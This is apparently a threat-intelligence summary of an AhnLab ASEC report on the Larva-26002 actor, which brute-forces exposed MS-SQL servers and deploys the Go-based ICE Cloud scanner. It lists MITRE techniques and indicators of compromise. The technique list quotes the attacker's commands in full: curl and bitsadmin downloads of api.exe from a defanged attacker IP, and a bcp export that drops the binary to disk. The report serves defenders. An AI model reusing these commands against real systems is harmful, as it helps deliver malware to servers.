AhnLab ASEC reports that the Larva-26002 actor continues to target internet‑exposed, improperly managed MS‑SQL servers and uses the BCP utility or downloaders to create and deploy scanner malware. The latest campaign installs a Go‑based scanner called ICE Cloud Client that authenticates with a C2, receives MSSQL scanning targets and credentials, and reports successful logins back to the server. #Larva26002 #ICECloud
Keypoints
- Larva-26002 targets exposed MS‑SQL servers using brute force and dictionary attacks against weak account credentials.
- The actor abuses the MS‑SQL BCP utility to export a stored malware binary from a database table and write it to disk (examples: table “uGnzBdZbsi” and format file “FODsOZKgAU.txt”).
- Where BCP is not used, the attacker deploys a downloader (api.exe) via curl, bitsadmin, or PowerShell to fetch the ICE Cloud components from hxxp://109.205.211[.]13/api.exe.
- The api.exe downloader installs ICE Cloud Launcher and then the ICE Cloud Client scanner (both written in Go); the scanner contains Turkish strings and AI‑style emoticons.
- ICE Cloud Client authenticates with a C2, receives lists of pre‑attack MS‑SQL targets and credentials (e.g., “mssql” protocol and “ecomm/ecomm”), attempts authentication, and reports successful results to the C2.
- Past Larva-26002 activity included deploying Trigona and Mimic ransomware and installing remote access tools such as AnyDesk and RMM like Teramind to maintain access.
MITRE Techniques
- [T1110 ] Brute Force – Larva-26002 performs password guessing and dictionary attacks against exposed MS‑SQL accounts (‘brute force attacks and dictionary attacks’).
- [T1218 ] Signed Binary Proxy Execution – The actor abuses the MS‑SQL BCP utility to export a stored binary to disk using a command such as ‘bcp “select binaryTable from uGnzBdZbsi” queryout “C:ProgramDataapi.exe” -T -f “C:ProgramDataFODsOZKgAU.txt”’.
- [T1105 ] Ingress Tool Transfer – Scanner/downloader binaries are transferred to victims using HTTP downloaders and utilities (‘curl -o “C:programdataapi.exe” “hxxp://109.205.211[.]13/api.exe”’, ‘bitsadmin /transfer job1 /download /priority high “hxxp://109.205.211[.]13/api.exe” “C:programdataapi.exe”’).
- [T1059.001 ] PowerShell – PowerShell is used as an alternative method to download and execute the scanner malware (‘Scanner malware download using PowerShell’).
- [T1021.001 ] Remote Services: RDP – The actor enables remote control by installing remote access and port‑forwarding tools to allow RDP connections (‘installed AnyDesk for remote control and a port forwarder for RDP connections’).
- [T1219 ] Remote Access Software – Legitimate remote access / RMM tools like AnyDesk and Teramind are used to maintain interactive access (‘installed AnyDesk for remote control’ and ‘used Teramind, an RMM tool’).
- [T1046 ] Network Service Discovery – The ICE Cloud Client functions as a scanner that enumerates MS‑SQL servers and receives lists of target addresses from the C2 (‘the server sends a list of addresses of pre-attack MS-SQL servers’).
- [T1071.001 ] Application Layer Protocol: Web Protocols – ICE Cloud Launcher/authentication and the download/request exchanges with the C2 use web protocols to obtain the ICE Cloud Client and send scan results (‘ICE Cloud Launcher authenticates by sending the following packet to the C&C server and then sends a download request to download the scanner, “ICE Cloud Client”’).
Indicators of Compromise
- [MD5 ] Malware sample hashes observed in the report – 0a9f2e2ff98e9f19428da79680e80b77, 28847cb6859b8239f59cbf2b8f194770, and 3 more hashes
- [URL ] Downloader host used to fetch scanner – hxxp://109[.]205[.]211[.]13/api[.]exe
- [FQDN ] Associated domain observed in report – hostroids[.]com
- [File Name ] Deployed filenames and SQL artifacts – C:ProgramDataapi.exe, C:ProgramDataFODsOZKgAU.txt (and SQL table ‘uGnzBdZbsi’)
Read more: https://asec.ahnlab.com/en/92988/